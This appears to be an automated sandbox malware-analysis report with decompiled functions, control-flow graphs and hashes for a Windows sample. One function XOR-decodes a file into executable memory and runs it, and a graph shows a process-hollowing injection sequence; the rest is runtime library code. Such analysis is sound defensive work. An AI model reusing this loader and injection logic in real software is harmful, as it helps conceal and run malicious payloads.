                                                                                              control_flow_graph 229 a4020a-a40225 call a4005f 232 a40228-a4022c 229->232 233 a40244-a40251 232->233 234 a4022e-a40242 232->234 235 a40254-a40258 233->235 234->232 236 a40270-a4027d 235->236 237 a4025a-a4026e 235->237 238 a40280-a40284 236->238 237->235 239 a40286-a4029a 238->239 240 a4029c-a4037a call a40073 * 8 238->240 239->238 257 a40391 240->257 258 a4037c-a40386 240->258 260 a40395-a403b1 257->260 258->257 259 a40388-a4038f 258->259 259->260 262 a403b3-a403b5 260->262 263 a403ba 260->263 264 a40734-a40737 262->264 265 a403c1-a403e9 CreateProcessW 263->265 266 a403f0-a40409 GetThreadContext 265->266 267 a403eb 265->267 269 a40410-a4042d ReadProcessMemory 266->269 270 a4040b 266->270 268 a406e8-a406ec 267->268 271 a40731-a40733 268->271 272 a406ee-a406f2 268->272 273 a40434-a4043d 269->273 274 a4042f 269->274 270->268 271->264 277 a406f4-a406ff 272->277 278 a40705-a40709 272->278 275 a40464-a40483 call a411c7 273->275 276 a4043f-a4044e 273->276 274->268 289 a40485 275->289 290 a4048a-a404ab call a412e1 275->290 276->275 279 a40450-a40456 call a41132 276->279 277->278 281 a40711-a40715 278->281 282 a4070b 278->282 288 a4045b-a4045d 279->288 286 a40717 281->286 287 a4071d-a40721 281->287 282->281 286->287 291 a40723-a40728 call a41132 287->291 292 a4072d-a4072f 287->292 288->275 294 a4045f 288->294 289->268 297 a404f0-a40510 call a412e1 290->297 298 a404ad-a404b4 290->298 291->292 292->264 294->268 304 a40517-a4052c call a400da 297->304 305 a40512 297->305 300 a404b6-a404e2 call a412e1 298->300 301 a404eb 298->301 307 a404e4 300->307 308 a404e9 300->308 301->268 311 a40535-a4053f 304->311 305->268 307->268 308->297 312 a40571-a40575 311->312 313 a40541-a4056f call a400da 311->313 314 a40655-a40671 call a40f80 312->314 315 a4057b-a40589 312->315 313->311 324 a40675-a40696 SetThreadContext 314->324 325 a40673 314->325 315->314 317 a4058f-a4059d 315->317 317->314 320 a405a3-a405c3 317->320 323 a405c6-a405ca 320->323 323->314 328 a405d0-a405e5 323->328 326 a40698 324->326 327 a4069a-a406a4 call a41081 324->327 325->268 326->268 334 a406a6 327->334 335 a406a8-a406ac 327->335 330 a405f7-a405fb 328->330 332 a405fd-a40609 330->332 333 a40638-a40650 330->333 336 a40636 332->336 337 a4060b-a40634 332->337 333->323 334->268 338 a406b4-a406b8 335->338 339 a406ae 335->339 336->330 337->336 341 a406c0-a406c4 338->341 342 a406ba 338->342 339->338 343 a406c6 341->343 344 a406cc-a406d0 341->344 342->341 343->344 345 a406d2-a406d7 call a41132 344->345 346 a406dc-a406e2 344->346 345->346 346->265 346->268
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D
                                                                                              • API String ID: 0-2746444292
                                                                                              • Opcode ID: 5e6889bd0eabaebacaff27748928f5839fd47a5bb3ab78cc0874189f6dc7fc64
                                                                                              • Instruction ID: 4f28c31ee48d7f6378a11f79b12ce62d5be5984078616a1ccf34d52416ebf52a
                                                                                              • Opcode Fuzzy Hash: 5e6889bd0eabaebacaff27748928f5839fd47a5bb3ab78cc0874189f6dc7fc64
                                                                                              • Instruction Fuzzy Hash: 6D02F274E00208EFDB50DF94C985FADBBB5BF84305F204069E615BA2A1D7B4AE90EF14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 77%
                                                                                              			E00401000(intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				long _v16;
				void* _v20;
				char* _v24;
				struct HWND__* _t32;
				intOrPtr _t36;
				long _t39;
				void* _t42;
				void* _t51;
				void* _t68;

				_v8 = 0;
				_v16 = 0;
				_v24 = "248058040134";
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t32, 0); // executed
				_t36 = E004047D3( *((intOrPtr*)(_a8 + (4 << 0))), 0x4188c0); // executed
				_v12 = _t36;
				E00404B34(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _v12, 0, 2); // executed
				_t39 = E004046EC(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _v12); // executed
				_v16 = _t39;
				E00404B34(_t51, _v12, _t68, _v12, 0, 0); // executed
				_t42 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v20 = _t42;
				E00404D47(_v20, _v16, 1, _v12); // executed
				while(_v8 < _v16) {
					asm("cdq");
					 *(_v20 + _v8) =  *(_v20 + _v8) & 0x000000ff ^ _v24[_v8 % 0xc] & 0x000000ff;
					_v8 = _v8 + 1;
				}
				goto __eax;
			}














                                                                                              0x00401006
                                                                                              0x0040100d
                                                                                              0x00401014
                                                                                              0x0040101d
                                                                                              0x00401024
                                                                                              0x0040103e
                                                                                              0x00401046
                                                                                              0x00401051
                                                                                              0x0040105d
                                                                                              0x00401065
                                                                                              0x00401070
                                                                                              0x00401085
                                                                                              0x0040108b
                                                                                              0x0040109c
                                                                                              0x004010a4
                                                                                              0x004010af
                                                                                              0x004010cf
                                                                                              0x004010d7
                                                                                              0x004010d7
                                                                                              0x004010df

                                                                                              APIs
                                                                                              • GetConsoleWindow.KERNELBASE(00000000), ref: 0040101D
                                                                                              • ShowWindow.USER32(00000000), ref: 00401024
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401085
                                                                                              • __fread_nolock.LIBCMT ref: 0040109C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$AllocConsoleShowVirtual__fread_nolock
                                                                                              • String ID: 248058040134
                                                                                              • API String ID: 494509129-1212554544
                                                                                              • Opcode ID: d9e336f1a58934cb35c22aa69edf088cef054baecdb967182e27135d834b7bc4
                                                                                              • Instruction ID: 8400c3b00eefad6752eb5410d92380c5310aeff6a3257fc7b802eb3fb4838582
                                                                                              • Opcode Fuzzy Hash: d9e336f1a58934cb35c22aa69edf088cef054baecdb967182e27135d834b7bc4
                                                                                              • Instruction Fuzzy Hash: C8214FB5E00208EBDB04DBD5C855FAEBB75AF84304F1084A9E615AB2C1D779AA00CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004067F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 400 4067f3-40680b call 40a373 403 406821-406837 SetFilePointerEx 400->403 404 40680d-406814 400->404 406 406839-40684a GetLastError call 407af3 403->406 407 40684c-406856 403->407 405 40681b-40681f 404->405 408 406872-406875 405->408 406->405 407->405 410 406858-40686d 407->410 410->408
                                                                                              C-Code - Quality: 88%
                                                                                              			E004067F3(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v12;
				void* _t19;
				int _t20;
				signed int _t23;
				intOrPtr _t26;
				signed int _t37;
				signed int _t38;
				signed int _t41;

				_t41 = _a4;
				_push(_t37);
				_t19 = E0040A373(_t41);
				_t38 = _t37 | 0xffffffff;
				if(_t19 != _t38) {
					_push(_a16);
					_t7 =  &_a12; // 0x416658
					_t20 = SetFilePointerEx(_t19, _a8,  *_t7,  &_v12); // executed
					if(_t20 != 0) {
						if((_v12 & _v8) == _t38) {
							goto L2;
						} else {
							_t23 = _v12;
							_t44 = (_t41 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0x418ec0 + (_t41 >> 6) * 4)) + _t44 + 0x28) =  *( *((intOrPtr*)(0x418ec0 + (_t41 >> 6) * 4)) + 0x28 + (_t41 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E00407AF3(GetLastError(), _a20);
						goto L2;
					}
				} else {
					_t26 = _a20;
					 *((char*)(_t26 + 0x1c)) = 1;
					 *((intOrPtr*)(_t26 + 0x18)) = 9;
					L2:
					_t23 = _t38;
				}
				return _t23;
			}












                                                                                              0x004067fb
                                                                                              0x004067fe
                                                                                              0x00406800
                                                                                              0x00406805
                                                                                              0x0040680b
                                                                                              0x00406821
                                                                                              0x00406828
                                                                                              0x0040682f
                                                                                              0x00406837
                                                                                              0x00406856
                                                                                              0x00000000
                                                                                              0x00406858
                                                                                              0x00406858
                                                                                              0x00406863
                                                                                              0x0040686d
                                                                                              0x0040686d
                                                                                              0x00406839
                                                                                              0x00406843
                                                                                              0x00000000
                                                                                              0x00406849
                                                                                              0x0040680d
                                                                                              0x0040680d
                                                                                              0x00406810
                                                                                              0x00406814
                                                                                              0x0040681b
                                                                                              0x0040681b
                                                                                              0x0040681d
                                                                                              0x00406875

                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,XfA,00401056,00000002,00401056,00000000,?,?,?,004068BD,00000000,?,00401056,00000002,00416658), ref: 0040682F
                                                                                              • GetLastError.KERNEL32(?,?,?,?,004068BD,00000000,?,00401056,00000002,00416658,00000000,00401056,00000000,00416658,0000000C,00404B5C), ref: 0040683C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID: XfA
                                                                                              • API String ID: 2976181284-2945588029
                                                                                              • Opcode ID: 2e1b0052e58c9bb1bf6e1d2d78629df0eafb82716d803286be43d78ddc7d448c
                                                                                              • Instruction ID: 1b48e83782f048c38c326af24b1a8bc700c37a0ac034aa5f252872bda7e7f746
                                                                                              • Opcode Fuzzy Hash: 2e1b0052e58c9bb1bf6e1d2d78629df0eafb82716d803286be43d78ddc7d448c
                                                                                              • Instruction Fuzzy Hash: 1D018933A00204AFCF049F59DC45C9E3F69EB85330B258129FC02BB2E1EA75ED519B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407951 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 412 407951-407956 413 407958-407970 412->413 414 407972-407976 413->414 415 40797e-407987 413->415 414->415 416 407978-40797c 414->416 417 407999 415->417 418 407989-40798c 415->418 419 4079f3-4079f7 416->419 422 40799b-4079a8 GetStdHandle 417->422 420 407995-407997 418->420 421 40798e-407993 418->421 419->413 423 4079fd-407a00 419->423 420->422 421->422 424 4079d5-4079e7 422->424 425 4079aa-4079ac 422->425 424->419 426 4079e9-4079ec 424->426 425->424 427 4079ae-4079b7 GetFileType 425->427 426->419 427->424 428 4079b9-4079c2 427->428 429 4079c4-4079c8 428->429 430 4079ca-4079cd 428->430 429->419 430->419 431 4079cf-4079d3 430->431 431->419
                                                                                              C-Code - Quality: 86%
                                                                                              			E00407951() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x418ec0 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							L16:
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x418eb0; // 0x5c6cc8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
							goto L18;
						} else {
							_t25 = GetFileType(_t28); // executed
							if(_t25 == 0) {
								goto L16;
							} else {
								_t20 = _t25 & 0x000000ff;
								 *(_t33 + 0x18) = _t28;
								if(_t20 != 2) {
									if(_t20 == 3) {
										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
									}
								} else {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
								}
								goto L18;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					L18:
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                                                              0x00407956
                                                                                              0x00407958
                                                                                              0x0040795c
                                                                                              0x00407965
                                                                                              0x00407970
                                                                                              0x00407980
                                                                                              0x00407984
                                                                                              0x00407987
                                                                                              0x00407999
                                                                                              0x00407989
                                                                                              0x0040798c
                                                                                              0x00407995
                                                                                              0x0040798e
                                                                                              0x00407991
                                                                                              0x00407991
                                                                                              0x0040798c
                                                                                              0x0040799b
                                                                                              0x004079a3
                                                                                              0x004079a8
                                                                                              0x004079d5
                                                                                              0x004079d5
                                                                                              0x004079d9
                                                                                              0x004079e0
                                                                                              0x004079e7
                                                                                              0x004079e9
                                                                                              0x004079ec
                                                                                              0x004079ec
                                                                                              0x00000000
                                                                                              0x004079ae
                                                                                              0x004079af
                                                                                              0x004079b7
                                                                                              0x00000000
                                                                                              0x004079b9
                                                                                              0x004079b9
                                                                                              0x004079bc
                                                                                              0x004079c2
                                                                                              0x004079cd
                                                                                              0x004079cf
                                                                                              0x004079cf
                                                                                              0x004079c4
                                                                                              0x004079c4
                                                                                              0x004079c4
                                                                                              0x00000000
                                                                                              0x004079c2
                                                                                              0x004079b7
                                                                                              0x00407978
                                                                                              0x00407978
                                                                                              0x00407978
                                                                                              0x004079f3
                                                                                              0x004079f3
                                                                                              0x004079f4
                                                                                              0x00407a00

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0040799D
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 004079AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleType
                                                                                              • String ID:
                                                                                              • API String ID: 3000768030-0
                                                                                              • Opcode ID: 7c458c61ff519796bc2e36ede78de9dedb8221427cf97d8a6e7991c78f528971
                                                                                              • Instruction ID: 8e449271c19dfcb024c65b4d8a4e34b1a40ec4627cdbbbabb8393f038bb9dd04
                                                                                              • Opcode Fuzzy Hash: 7c458c61ff519796bc2e36ede78de9dedb8221427cf97d8a6e7991c78f528971
                                                                                              • Instruction Fuzzy Hash: 1C1172E1D0C75146E7304A3E8C88627BA95A756330B38077BD1B6E66F1C63CE886D64B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404092 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 432 404092-40409f 433 4040a1-4040c4 call 4064aa 432->433 434 4040c9-4040dd call 40656b 432->434 439 404230-404232 433->439 440 4040e2-4040eb call 406876 434->440 441 4040df 434->441 443 4040f0-4040ff 440->443 441->440 444 404101 443->444 445 40410f-404118 443->445 446 404107-404109 444->446 447 4041d9-4041de 444->447 448 40411a-404127 445->448 449 40412c-404160 445->449 446->445 446->447 450 40422e-40422f 447->450 451 40422c 448->451 452 404162-40416c 449->452 453 4041bd-4041c9 449->453 450->439 451->450 456 404193-40419f 452->456 457 40416e-40417a 452->457 454 4041e0-4041e3 453->454 455 4041cb-4041d2 453->455 460 4041e6-4041ee 454->460 455->447 456->454 459 4041a1-4041bb call 40462d 456->459 457->456 458 40417c-40418e call 404482 457->458 458->450 459->460 463 4041f0-4041f6 460->463 464 40422a 460->464 467 4041f8-40420c call 4042b7 463->467 468 40420e-404212 463->468 464->451 467->450 469 404214-404222 call 410b00 468->469 470 404225-404227 468->470 469->470 470->464
                                                                                              C-Code - Quality: 93%
                                                                                              			E00404092(signed int __edx, void* __esi, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				signed char _t73;
				signed int _t75;
				signed char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t93;
				signed int _t97;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr* _t105;
				signed char _t106;
				signed int _t107;
				signed int _t109;
				signed int _t112;
				signed int _t117;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;

				_t116 = __esi;
				_t108 = __edx;
				if(_a4 != 0) {
					_t70 = E0040656B(_a4);
					_t102 = _a4;
					_t97 = _t70;
					__eflags =  *(_t102 + 8);
					if( *(_t102 + 8) < 0) {
						 *(_t102 + 8) = 0;
					}
					_t71 = E00406876(_t97, 0, 0, 1, _a8); // executed
					_t103 = _t108;
					_t122 = _t121 + 0x14;
					_v8 = _t103;
					_t117 = _t71;
					_v28 = _t117;
					__eflags = _t103;
					if(__eflags > 0) {
						L7:
						_t73 =  *(_a4 + 0xc);
						__eflags = _t73 & 0x000000c0;
						if((_t73 & 0x000000c0) != 0) {
							_t75 = _t97 >> 6;
							_t104 = (_t97 & 0x0000003f) * 0x38;
							_v16 = _t75;
							_v20 = _t104;
							_t105 = _a4;
							_v12 =  *((intOrPtr*)(_t104 +  *((intOrPtr*)(0x418ec0 + _t75 * 4)) + 0x29));
							_t106 =  *(_t105 + 0xc);
							asm("cdq");
							_t99 =  *_t105 -  *((intOrPtr*)(_t105 + 4));
							_v24 = _t108;
							__eflags = _t106 & 0x00000003;
							if((_t106 & 0x00000003) == 0) {
								_t82 =  *(_a4 + 0xc) >> 2;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									L18:
									_t118 = _a4;
									_t103 = _v24;
									L19:
									_t109 = _v28;
									__eflags = _t109 | _v8;
									if((_t109 | _v8) == 0) {
										L25:
										_t85 = _t99;
										L26:
										goto L27;
									}
									_t86 =  *(_t118 + 0xc);
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										__eflags = _v12 - 1;
										if(_v12 == 1) {
											_t87 = E00410B00(_t99, _t103, 2, 0);
											_t103 = _t109;
											_t99 = _t87;
											_t109 = _v28;
										}
										_t99 = _t99 + _t109;
										asm("adc ecx, [ebp-0x4]");
										goto L25;
									}
									_t85 = E004042B7(_a4, _t109, _v8, _t99, _t103, _a8);
									goto L27;
								}
								_t71 = _a8;
								 *((char*)(_t71 + 0x1c)) = 1;
								 *((intOrPtr*)(_t71 + 0x18)) = 0x16;
								goto L17;
							}
							__eflags = _v12 - 1;
							_t107 = _v16;
							_t112 = _v20;
							if(_v12 != 1) {
								L13:
								_t88 =  *((intOrPtr*)(0x418ec0 + _t107 * 4));
								__eflags =  *((char*)(_t112 + _t88 + 0x28));
								if( *((char*)(_t112 + _t88 + 0x28)) >= 0) {
									goto L18;
								}
								_t118 = _a4;
								_t89 = E0040462D( *((intOrPtr*)(_t118 + 4)),  *_t118, _v12);
								_t103 = _v24;
								_t122 = _t122 + 0xc;
								_t99 = _t99 + _t89;
								asm("adc ecx, edx");
								goto L19;
							}
							_t90 =  *((intOrPtr*)(0x418ec0 + _t107 * 4));
							__eflags =  *(_t112 + _t90 + 0x2d) & 0x00000002;
							if(( *(_t112 + _t90 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t85 = E00404482(0, _t117, _a4, _t117, _v8, _a8);
							goto L27;
						}
						asm("cdq");
						_t85 = _t117 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L26;
					} else {
						if(__eflags < 0) {
							L17:
							_t85 = _t71 | 0xffffffff;
							L27:
							return _t85;
						}
						__eflags = _t117;
						if(_t117 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				_t93 = _a8;
				 *((char*)(_t93 + 0x1c)) = 1;
				 *((intOrPtr*)(_t93 + 0x18)) = 0x16;
				return E004064AA(0, __esi, 0, 0, 0, 0, 0, _t93) | 0xffffffff;
			}





































                                                                                              0x00404092
                                                                                              0x00404092
                                                                                              0x0040409f
                                                                                              0x004040cd
                                                                                              0x004040d3
                                                                                              0x004040d8
                                                                                              0x004040da
                                                                                              0x004040dd
                                                                                              0x004040df
                                                                                              0x004040df
                                                                                              0x004040eb
                                                                                              0x004040f0
                                                                                              0x004040f2
                                                                                              0x004040f5
                                                                                              0x004040f8
                                                                                              0x004040fa
                                                                                              0x004040fd
                                                                                              0x004040ff
                                                                                              0x0040410f
                                                                                              0x00404112
                                                                                              0x00404116
                                                                                              0x00404118
                                                                                              0x00404131
                                                                                              0x00404134
                                                                                              0x00404137
                                                                                              0x00404141
                                                                                              0x00404148
                                                                                              0x0040414b
                                                                                              0x00404153
                                                                                              0x00404156
                                                                                              0x00404157
                                                                                              0x00404159
                                                                                              0x0040415d
                                                                                              0x00404160
                                                                                              0x004041c4
                                                                                              0x004041c7
                                                                                              0x004041c9
                                                                                              0x004041e0
                                                                                              0x004041e0
                                                                                              0x004041e3
                                                                                              0x004041e6
                                                                                              0x004041e6
                                                                                              0x004041eb
                                                                                              0x004041ee
                                                                                              0x0040422a
                                                                                              0x0040422a
                                                                                              0x0040422c
                                                                                              0x00000000
                                                                                              0x0040422c
                                                                                              0x004041f0
                                                                                              0x004041f4
                                                                                              0x004041f6
                                                                                              0x0040420e
                                                                                              0x00404212
                                                                                              0x00404219
                                                                                              0x0040421e
                                                                                              0x00404220
                                                                                              0x00404222
                                                                                              0x00404222
                                                                                              0x00404225
                                                                                              0x00404227
                                                                                              0x00000000
                                                                                              0x00404227
                                                                                              0x00404204
                                                                                              0x00000000
                                                                                              0x00404209
                                                                                              0x004041cb
                                                                                              0x004041ce
                                                                                              0x004041d2
                                                                                              0x00000000
                                                                                              0x004041d2
                                                                                              0x00404162
                                                                                              0x00404166
                                                                                              0x00404169
                                                                                              0x0040416c
                                                                                              0x00404193
                                                                                              0x00404193
                                                                                              0x0040419a
                                                                                              0x0040419f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004041a1
                                                                                              0x004041ac
                                                                                              0x004041b1
                                                                                              0x004041b4
                                                                                              0x004041b7
                                                                                              0x004041b9
                                                                                              0x00000000
                                                                                              0x004041b9
                                                                                              0x0040416e
                                                                                              0x00404175
                                                                                              0x0040417a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404186
                                                                                              0x00000000
                                                                                              0x0040418b
                                                                                              0x00404120
                                                                                              0x00404123
                                                                                              0x00404125
                                                                                              0x00000000
                                                                                              0x00404101
                                                                                              0x00404101
                                                                                              0x004041d9
                                                                                              0x004041d9
                                                                                              0x0040422e
                                                                                              0x00000000
                                                                                              0x0040422f
                                                                                              0x00404107
                                                                                              0x00404109
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404109
                                                                                              0x004040ff
                                                                                              0x004040a1
                                                                                              0x004040ac
                                                                                              0x004040b0
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4e8d6994717699f0e94329a8b457d3c1a343de9141e2040c0d32cd79e4d6c63
                                                                                              • Instruction ID: eda41fbeac5d3a47a77bed54da0e3d784e339aa322b7f55359feffab3cc670e3
                                                                                              • Opcode Fuzzy Hash: a4e8d6994717699f0e94329a8b457d3c1a343de9141e2040c0d32cd79e4d6c63
                                                                                              • Instruction Fuzzy Hash: CE5106B0A00104AFCB14CF59DC44AAA7FB1EF99354F24816EF909AB392D3759E81CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407ECD Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 475 407ecd-407ef3 call 407ca3 478 407ef5-407f07 call 40c357 475->478 479 407f4c-407f4f 475->479 481 407f0c-407f11 478->481 481->479 482 407f13-407f4b 481->482
                                                                                              C-Code - Quality: 72%
                                                                                              			E00407ECD(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E00407CA3(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E0040C357( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x418eb4 =  *0x418eb4 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}









                                                                                              0x00407ede
                                                                                              0x00407eea
                                                                                              0x00407eeb
                                                                                              0x00407eec
                                                                                              0x00407ef3
                                                                                              0x00407f4c
                                                                                              0x00407f4f
                                                                                              0x00407ef5
                                                                                              0x00407f07
                                                                                              0x00407f11
                                                                                              0x00000000
                                                                                              0x00407f13
                                                                                              0x00407f16
                                                                                              0x00407f22
                                                                                              0x00407f2a
                                                                                              0x00407f30
                                                                                              0x00407f36
                                                                                              0x00407f3c
                                                                                              0x00407f44
                                                                                              0x00407f4b
                                                                                              0x00407f4b
                                                                                              0x00407f11

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: aa105744ec724d6492fa52795bcd8a3472d403bb09466538711de480dce8988d
                                                                                              • Instruction ID: d462f14356711a6f17fcae6cb908a47d6fb6d0fd66d172a76acc2b1eb0390f8d
                                                                                              • Opcode Fuzzy Hash: aa105744ec724d6492fa52795bcd8a3472d403bb09466538711de480dce8988d
                                                                                              • Instruction Fuzzy Hash: 37111871A0420AAFCB05DF59E94199B7BF5EF48304F0540AAF805EB351D674E911CBA9
